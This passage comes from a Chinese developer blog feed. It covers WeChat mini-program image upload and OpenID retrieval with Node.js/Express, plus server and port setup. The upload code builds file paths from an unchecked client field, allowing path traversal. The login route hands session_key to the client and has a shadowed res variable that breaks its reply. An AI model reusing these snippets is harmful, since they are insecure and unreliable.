function_">chooseImage</span>({</span><br><span class="line"> <span class="attr">count</span>: <span class="number">1</span>,</span><br><span class="line"> <span class="attr">sizeType</span>: [<span class="string">'original'</span>],</span><br><span class="line"> <span class="attr">sourceType</span>: [<span class="string">'album'</span>, <span class="string">'camera'</span>],</span><br><span class="line"> <span class="attr">success</span>: <span class="function">(<span class="params">res</span>) =></span> {</span><br><span class="line"> <span class="keyword">const</span> tempFilePaths = res.<span class="property">tempFilePaths</span>[<span class="number">0</span>]</span><br><span class="line"> that.<span class="title function_">setData</span>({</span><br><span class="line"> <span class="attr">imgSrc</span>: tempFilePaths</span><br><span class="line"> });</span><br><span class="line"> wx.<span class="title function_">uploadFile</span>({</span><br><span class="line"> <span class="attr">url</span>: <span class="string">'https://www.xxxxxx.com/img'</span>, <span class="comment">//服务器接口地址</span></span><br><span class="line"> <span class="attr">filePath</span>: tempFilePaths,</span><br><span class="line"> <span class="attr">name</span>: <span class="string">'file'</span>,</span><br><span class="line"> <span class="attr">formData</span>:{</span><br><span class="line"> <span class="string">'roomID'</span>: roomID</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">header</span>: {</span><br><span class="line"></span><br><span class="line"> <span class="string">'content-type'</span>: <span class="string">'multipart/form-data'</span></span><br><span class="line"></span><br><span class="line"> },</span><br><span class="line"> <span class="attr">success</span>: <span class="keyword">function</span> (<span class="params">res</span>) {</span><br><span class="line"> <span class="keyword">var</span> data = res.<span class="property">data</span>;</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(data);</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">fail</span>: <span class="keyword">function</span> (<span class="params">e</span>) {</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(e.<span class="property">stack</span>);</span><br><span class="line"> }</span><br><span class="line"> })</span><br><span class="line"> }</span><br><span class="line"> })</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>前端代码没啥好讲的其实……,如有疑问可以私信我或者评论区见哦</p><hr><h2 id="后端部分"><a href="#后端部分" class="headerlink" title="后端部分"></a>后端部分</h2><p>后端部分才是重重之重</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">"express"</span>);</span><br><span class="line"><span class="keyword">var</span> formidable = <span class="built_in">require</span>(<span class="string">"formidable"</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">"path"</span>)</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>)</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">"/img"</span>, <span class="function">(<span class="params">req, res</span>) =></span> {</span><br><span class="line"> <span class="keyword">var</span> form = <span class="keyword">new</span> formidable.<span class="title class_">IncomingForm</span>();<span class="comment">//既处理表单,又处理文件上传</span></span><br><span class="line"> <span class="comment">//设置文件上传文件夹/路径,__dirname是一个常量,为当前路径</span></span><br><span class="line"> <span class="keyword">let</span> uploadDir = path.<span class="title function_">join</span>(<span class="string">"../img/"</span>);</span><br><span class="line"> form.<span class="property">uploadDir</span> = uploadDir;<span class="comment">// 设置文件的临时存储存储路径,如果不设置的话默认设置到 os.tmpdir()</span></span><br><span class="line"> form.<span class="property">encoding</span> = <span class="string">'utf-8'</span>; <span class="comment">// 将请求信息编码设置为utf-8</span></span><br><span class="line"> form.<span class="property">keepExtensions</span> = <span class="literal">true</span>; <span class="comment">// nodejs会默认将文件信息保存在一个没有后缀的文件中,设置为true将保留后缀</span></span><br><span class="line"> form.<span class="property">maxFieldsSize</span> = <span class="number">2</span> * <span class="number">1024</span> * <span class="number">1024</span>; <span class="comment">//文件大小</span></span><br><span class="line"> form.<span class="title function_">parse</span>(req, <span class="function">(<span class="params">err, fields, files</span>) =></span> {</span><br><span class="line"> <span class="keyword">var</span> roomID = fields.<span class="property">roomID</span>;</span><br><span class="line"> <span class="keyword">let</span> oldPath = files.<span class="property">file</span>.<span class="property">path</span>; <span class="comment">//这里的路径是图片的本地路径</span></span><br><span class="line"> <span class="keyword">let</span> newPath = <span class="string">'/home/ubuntu/img/'</span> + roomID + <span class="string">'.jpg'</span>;</span><br><span class="line"> fs.<span class="title function_">rename</span>(oldPath, newPath, <span class="keyword">function</span> (<span class="params">err</span>) {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(newPath);</span><br><span class="line"> }</span><br><span class="line"> })</span><br><span class="line"> res.<span class="title function_">send</span>({</span><br><span class="line"> <span class="attr">code</span>: <span class="number">200</span>,</span><br><span class="line"> <span class="attr">msg</span>: <span class="string">'/img/'</span> + newPath</span><br><span class="line"> });</span><br><span class="line"></span><br><span class="line"> })</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">6666</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>这个图片上传我一开始以为很简单(确实不难),但是后来却出了问题,原因就是对node.js的不熟悉,尤其是formidable这个东东。我一开始也是在网上找的后端代码,里面内容几乎没有,所以自然就失败了……。后来我又找到了一次代码,其实当时找的代码再加上我自己改编后已经满足条件了,但是在路径设置上出了问题,如果当时研究研究formidable就好了,我太过依赖网上找的代码。后来我的队长找了一篇<a href="https://cloud.tencent.com/developer/article/1467373">文章</a>,并且给我之前就把路径问题解决了,当我看到代码和我差不多的时候是哭笑不得。自己就差一点就成功了,所以仔细学语言真的很重要,对这个模块多了解才能发现细微的错误。其实到现在我还没有深入了解formidable,但是代码我差不多都看懂了。注释的部分其实都好理解,但是我们在解决传值的问题的时候就需要注意了。<br><strong>fields</strong> 和 <strong>files</strong><br>注意看node代码中路径的获取,是在files里获取的。<br>小程序前端中formdata中传的值roomID是在fields里获取的。<br>在解决路径问题后我在网上搜索过node怎么接受formdata的传值,但是网上关于小程序的formdata的传值记录不多。我在微信开发者社区里找到了一点信息,有说让用插件的,不过我看都挺复杂。而且在评论中有人提到小程序的formdata是不严格的,反正是有点毛病。后来我通过获取路径的方法寻找formdata传值,多次打印console.log,终于在fields里找到了roomID。至于怎么利用传过来的值我就不细说了。<br>其实在文章末尾的链接文章中有保持图片原有后缀的代码,但是那个的前提是要先获取后缀,是 files.file.type,这个获取的即使图片后缀。</p><p>图片换名:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fs.<span class="title function_">rename</span>(oldPath, newPath, <span class="keyword">function</span> (<span class="params">err</span>) {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(newPath);</span><br><span class="line"> }</span><br><span class="line"> })</span><br></pre></td></tr></table></figure><p>还有最后特别重要的一点——<strong>路径</strong><br>注意看图片新名称newPath的拼接方式<br> <code>let newPath = '/home/ubuntu/img/' + roomID + '.jpg';</code></p><p>最终存储在服务器的图片名称显示为 roomID.jpg,</p><p>roomID的值是101,那图片显示的名字就是101.jpg,</p><p>roomID前面的一串路径就是图片在服务器的位置。</p><p>大家可以看我的另一篇<a href="https://editor.csdn.net/md/?articleId=105526742">博客</a>,里面的WinSCP部分的截图就有显示我图片储存位置的路径。</p><p>参考文章:<br><a href="https://www.cnblogs.com/JobsOfferings/p/JonsOfferings_node_imgUp.html#4549239">https://www.cnblogs.com/JobsOfferings/p/JonsOfferings_node_imgUp.html#4549239</a></p><p><a href="https://www.cnblogs.com/xiaofeixiang/p/5140673.html">https://www.cnblogs.com/xiaofeixiang/p/5140673.html</a></p>]]></content>
<summary type="html"><h2 id="前端部分"><a href="#前端部分" class="headerlink" title="前端部分"></a>前端部分</h2><figure class="highlight javascript"><table><tr><td class="gutter</summary>
<category term="WeChat Applet" scheme="http://example.com/categories/WeChat-Applet/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
<category term="nodejs" scheme="http://example.com/tags/nodejs/"/>
</entry>
<entry>
<title>获取openid</title>
<link href="http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%8E%B7%E5%8F%96openid%EF%BC%8C%E5%90%8E%E7%AB%AF%E8%AF%AD%E8%A8%80%EF%BC%9Anode.js/"/>
<id>http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%8E%B7%E5%8F%96openid%EF%BC%8C%E5%90%8E%E7%AB%AF%E8%AF%AD%E8%A8%80%EF%BC%9Anode.js/</id>
<published>2020-04-15T05:33:13.000Z</published>
<updated>2022-03-18T06:03:46.021Z</updated>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>说实话,获取OpenID这部分操作是我做小程序到现在耗时最长、精力投入最多的!所以我打算来个比较详细的讲解。因为这个是上周完成的操作,后续我去完善其他功能了,所以当时的报错截图我并没有保留多少,而且有一部分内容现在还有点忘了…………QAQ。<br>综上,一定要养成随笔记录的好习惯!</p><hr><h2 id="OpenID和unionID"><a href="#OpenID和unionID" class="headerlink" title="OpenID和unionID"></a>OpenID和unionID</h2><p>OpenID是公众号的普通用户的一个唯一的标识,只针对当前的应用有效。公众号和小程序都是应用,所以不同公众号和小程序对应的openid是不同的,但是单拿出来一个应用的openid就是不变的。<br>其实获取身份唯一标识最好是unionID,这个不管在多少个应用里值永远唯一,在多个应用中确定用户身份用unionID无疑是最好的,但是获取unionID的首要条件是需要绑定微信开放平台。<img src="https://img-blog.csdnimg.cn/20200415081438498.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>当时我绑定半天微信开放平台都不成功,可能和我小程序账号未认证有关吧,后来了解到绑定开放平台后需要花钱认证(不是小程序账号认证)才能获取,个人感觉麻烦,而且我们的小程序也只有一个,综合考虑用OpenID就足够了。<br>获取unionIDD的官方文档比较详细,地址:<a href="https://developers.weixin.qq.com/doc/offiaccount/User_Management/Get_users_basic_information_UnionID.html#UinonId">https://developers.weixin.qq.com/doc/offiaccount/User_Management/Get_users_basic_information_UnionID.html#UinonId</a></p><hr><h2 id="配置问题"><a href="#配置问题" class="headerlink" title="配置问题"></a>配置问题</h2><p>这个配置问题是在我解决过程中最无奈也是最关键的部分,作为一个程序猿,不能只会前后端语言,一些网站配置啊什么的也得会,后面我会说不会是多么的痛苦!</p><ol><li>首先就要在微信公众平台配置合法域名,这个就不用我多说了,域名备案,给域名安装SSL证书这些操作我就不教学了。只有配置合法域名之后才能做以后的步骤。</li><li>设置端口号,小程序默认端口号是443,在小程序前端js部分请求的url直接填 https://“你的域名” 就行,不用再后面加端口号。我觉得给域名多设置几个端口号是有必要的,因为在你本地调试的时候很有可能会出现端口被占用的情况,这时候换个之前设过的端口号就可。.[^1]</li><li>既然都涉及服务器了,就需要把后端代码上传给服务器,然后在服务器上运行你的后端文件。<br> ①:本地与远程计算机间安全的复制文件(本地——服务器)的软件推荐——WinSCP<br>在刚进WinSCP页面会有这个界面<img src="https://img-blog.csdnimg.cn/20200415094634411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>主机名:服务器ip<br>用户名:服务器账号<br>密码:服务器密码<br>在左面右键文件上传,上传文件夹或文件都行。<img src="https://img-blog.csdnimg.cn/20200415095241747.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200415095257760.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>②:安全终端模拟软件推荐——Xsell<br>Xshell可以在Windows界面下用来访问远端不同系统下的服务器,从而比较好的达到远程控制终端的目的。就是说在windows下进行linux操作命令。首先新建会话<br><img src="https://img-blog.csdnimg.cn/2020041510005655.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>第三步:填写服务器账号<img src="https://img-blog.csdnimg.cn/20200415112355283.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>第四部:填写服务器密码<img src="https://img-blog.csdnimg.cn/20200415112402601.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>第五步: 执行node命令,后端js文件在哪里就cd到哪里执行<br>当然,在这之前得先在服务器上配置好node.js环境,像express这些可以在下面那个界面npm安装(也可以执行node命令)<img src="https://img-blog.csdnimg.cn/20200415100720965.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>因为我是在小队里,所以有些东西不是我去干。像服务器配置环境这些应该是我的活,但是我对服务器这一块了解不多,包括在服务器上运行后端的js文件也是要获取openid才开始这么干的。而且我在队伍里进度算慢的,所以我的队长帮助我整了不少活,包括这个服务器环境配置和端口的设置,我现在就是在配置方面把我会的写出来,一些我不会的我只能在过程中提一嘴,剩下的就靠大家自己了。</li></ol><hr><p>[^1]: 关于设置端口这个操作我是不会的,我的队长是通过宝塔进行设置的,大家可以去学一下,宝塔进入方式 http://“你的域名”:8888<br> 宝塔的默认端口就是8888,开头一定要用http而不是https。<br> 我把<strong>换端口</strong>的操作说一下:<br> <img src="https://img-blog.csdnimg.cn/20200415111709177.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>①:刚进宝塔是要登录的,如上图:<br>获取默认账号密码:<img src="https://img-blog.csdnimg.cn/20200415112545667.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>②:在目录——安全 看未使用的端口号<br>怎么设置端口号鹅不会,哈哈<br><img src="https://img-blog.csdnimg.cn/2020041512365299.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>③:在目录——网站——设置——配置文件 找到location /<br>修改域名后面的端口号就可以了,我的是6666,想改成其他的就从未使用的端口号选一个。<br><img src="https://img-blog.csdnimg.cn/20200415124038725.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>④:在目录——软件商店——Nginx——设置 选择重启<br>宝塔里的Ngnix安装挺简单的,在软件商店里找到nginx点击安装,等他安装完就ok了<br><img src="https://img-blog.csdnimg.cn/20200415124410532.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><h2 id="前端部分"><a href="#前端部分" class="headerlink" title="前端部分"></a>前端部分</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//.wxml</span></span><br><span class="line"><view <span class="keyword">class</span>=<span class="string">"tui-picker-content"</span>></span><br><span class="line"><span class="language-xml"><span class="tag"><<span class="name">button</span> <span class="attr">bindtap</span>=<span class="string">"open"</span>></span>确认身份<span class="tag"></<span class="name">button</span>></span></span></span><br><span class="line"></view></span><br></pre></td></tr></table></figure><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//.js</span></span><br><span class="line">wx.<span class="title function_">login</span>({<span class="comment">//先调用 wx.login() 获取 临时登录凭证code </span></span><br><span class="line"> <span class="attr">success</span>: <span class="function"><span class="params">res</span> =></span>{</span><br><span class="line"> <span class="keyword">const</span> code = res.<span class="property">code</span> <span class="comment">//获取到用户临时登录凭证code </span></span><br><span class="line"> wx.<span class="title function_">request</span>({<span class="comment">//发送请求</span></span><br><span class="line"> <span class="attr">url</span>: <span class="string">"http://“你的域名”?code="</span>+code,<span class="comment">//携带code</span></span><br><span class="line"> <span class="attr">success</span>: <span class="function">(<span class="params">res</span>) =></span>{<span class="comment">//返回node请求到的OpenID与session_key</span></span><br><span class="line"> <span class="keyword">const</span> openid = res.<span class="property">data</span>.<span class="property">openid</span></span><br><span class="line"> wx.<span class="title function_">setStorageSync</span>(<span class="string">"openid"</span>, openid)</span><br><span class="line"> }</span><br><span class="line"> })</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">fail</span>: <span class="variable language_">console</span>.<span class="property">log</span></span><br><span class="line"> })</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>嗯,你没看错,前端跟官方文档差不多,没多点儿。</p><hr><h2 id="后端部分"><a href="#后端部分" class="headerlink" title="后端部分"></a>后端部分</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">const</span> request = <span class="built_in">require</span>(<span class="string">'request'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> appid = <span class="string">"wx123123123"</span> <span class="comment">//开发者的appid</span></span><br><span class="line"><span class="keyword">const</span> appsecret = <span class="string">"123123123123"</span> <span class="comment">//开发者的appsecret 登入小程序公共平台内查看</span></span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(<span class="string">'/login'</span>, <span class="function">(<span class="params">req,res</span>)=></span>{</span><br><span class="line"> <span class="keyword">const</span> code = req.<span class="property">query</span>.<span class="property">code</span> <span class="comment">//拿到传过来的code</span></span><br><span class="line"> <span class="comment">//调用 auth.code2Session接口,换取用户唯一标识 OpenID 和 会话密钥 session_key</span></span><br><span class="line"> <span class="keyword">const</span> url = <span class="string">`https://api.weixin.qq.com/sns/jscode2session?appid=<span class="subst">${appid}</span>&secret=<span class="subst">${appsecret}</span>&js_code=<span class="subst">${code}</span>&grant_type=authorization_code`</span></span><br><span class="line"></span><br><span class="line"> <span class="title function_">request</span>(url, <span class="function">(<span class="params">err,res,body</span>)=></span>{</span><br><span class="line"> res.<span class="title function_">send</span>(body) <span class="comment">//将请求到的 OpenID与 session_key 返回给小程序页面js文件</span></span><br><span class="line"> })</span><br><span class="line"></span><br><span class="line">})</span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">6666</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>后端代码,也还是不多,跟在其他地方搜索的也差不多,还是这么简单。</p><hr><p>这个困扰我好几天的问题就是这么简单!但是为啥困扰我这么多天呢?<br>就是万恶的配置问题!!!<br>我的代码其实在前两天的查找就完成了,但是一直报这个错:<img src="https://img-blog.csdnimg.cn/20200415131231566.jpg" alt="在这里插入图片描述"><br>工具未检验合法域名这个警告不用在意,这个报错截图是我在和队长的聊天记录里找到的,之前的报错截图我都没保存……<br>我记得还有一个404 not found 的报错,但是出现频率没这个高。<br>这个报错是端口问题 ,我之前没设过端口,小程序默认的就是443,但是之后解决的过程中队长告诉我443被占用了,是因为Ngnix占用了443接口。之后队长在宝塔那边换了端口(这个换端口号的本质是把发送了443端口的请求通过nginx转接到http的6666端口)就解决了……,我一开始以为代码有问题熬夜找了两天,最后发现问题不在代码身上……,唉……</p><hr><p><strong>总结</strong>:代码方面其实不难,最重要的就是配置问题。合法域名、正确端口,解决了配置问题就问题不大了。希望和我情况一样的小伙伴能够找到我这篇博客,Emm……</p><p>如果有这个类型的其他问题或者发现文章中有错误地方的小伙伴欢迎私信或者评论</p><hr><p>本篇博客代码部分参考博客<br><a href="https://blog.csdn.net/qq_41614928/article/details/90408891?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2">https://blog.csdn.net/qq_41614928/article/details/90408891?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2</a></p>]]></content>
<summary type="html"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>说实话,获取OpenID这部分操作是我做小程序到现在耗时最长、精力投入最多的!所以我打算来个比较详细的讲解。因为这个是上周完成的操作,后续我</summary>
<category term="WeChat Applet" scheme="http://example.com/categories/WeChat-Applet/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
<category term="nodejs" scheme="http://example.com/tags/nodejs/"/>
</entry>
<entry>
<title>wx:request请求&Node.js编写api接口</title>
<link href="http://example.com/2020/03/21/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94wx_request%E8%AF%B7%E6%B1%82&Node.js%E7%BC%96%E5%86%99api%E6%8E%A5%E5%8F%A3/"/>
<id>http://example.com/2020/03/21/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94wx_request%E8%AF%B7%E6%B1%82&Node.js%E7%BC%96%E5%86%99api%E6%8E%A5%E5%8F%A3/</id>
<published>2020-03-21T01:08:36.000Z</published>
<updated>2022-03-18T06:03:46.021Z</updated>
<content type="html"><![CDATA[<h2 id="简析wx-request"><a href="#简析wx-request" class="headerlink" title="简析wx.request"></a>简析wx.request</h2><h3 id="url"><a href="#url" class="headerlink" title="url"></a>url</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">url</span>:<span class="string">'开发者服务器接口地址'</span></span><br></pre></td></tr></table></figure><p>接口地址填写你小程<strong>绑定的合法域名</strong>就可以,本地测试的话文章底部番外会提到。</p><hr><h3 id="data"><a href="#data" class="headerlink" title="data"></a>data</h3><p>我们对url进行https请求跟在浏览器打开一个网址是一个道理。在浏览器打开网址,实际上是向这个域包所在的服务器发送了一个https请求。<br>格式为:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">url</span>:<span class="string">'http://xxxxxxx.com'</span>, <span class="comment">//这个接口随便写的</span></span><br><span class="line"> <span class="attr">data</span>: {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'1'</span> ,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'2020-3-20'</span></span><br><span class="line"> }</span><br></pre></td></tr></table></figure><p>或者</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">url</span>:<span class="string">'http://xxxxxxx.com?id=1&dataTime=2020-3-20'</span>,</span><br></pre></td></tr></table></figure><p>两者的代码意义一样, data里的值就是使用wx.request时url里面的参数,即问号后面的参数。</p><ul><li>data 数据说明:最终发送给服务器的数据是 String 类型,如果传入的 data 不是 String 类型,会被转换成 String 。具体说明小程序的<a href="https://developers.weixin.qq.com/miniprogram/dev/api/network/request/wx.request.html">官方文档</a>里有,我就不复制粘贴了。</li></ul><hr><h3 id="header"><a href="#header" class="headerlink" title="header"></a>header</h3><p>https请求的头部header是在用户打开小程序后请求url时一起传到url所在的服务器时的头部信息,也就是说我们请求一个网址,实际上一起跟着这个网址传递到服务器的还有“请求头”;当请求完信息后,服务器再通过http协议把请求的信息返回给请求的用户,此时有一个“响应头”返回给用户,只不过两个头用户都感觉不到看不到罢了。<br>格式为:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">header</span>: {</span><br><span class="line"> <span class="string">'content-type'</span>: <span class="string">'application/json'</span></span><br><span class="line"> },</span><br></pre></td></tr></table></figure><ul><li>注意一点:header 中不能设置 Referer,<code>content-type</code> 默认为 <code>application/json</code>。所以这个请求头的数据写上也没用……</li></ul><hr><h3 id="success"><a href="#success" class="headerlink" title="success"></a>success</h3><p>当一个https请求成功时,小程序就会自动触发这个返回成功信息的函数。 这个函数获取的是从开发者服务器返回的数据(一般为json格式),因为,获取到的数据就是我们要<strong>渲染到小程序页面的数据</strong>。(写到这里终于切题了……)<br>示例:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.wxml</span></span><br><span class="line"><view <span class="keyword">class</span>=<span class="string">"container"</span>></span><br><span class="line"> <span class="language-xml"><span class="tag"><<span class="name">block</span> <span class="attr">wx:for</span>=<span class="string">"{{contents}}"</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"><<span class="name">view</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"><<span class="name">text</span>></span>{{item.id}}---{{item.behavior}}---{{item.dateTime}}<span class="tag"></<span 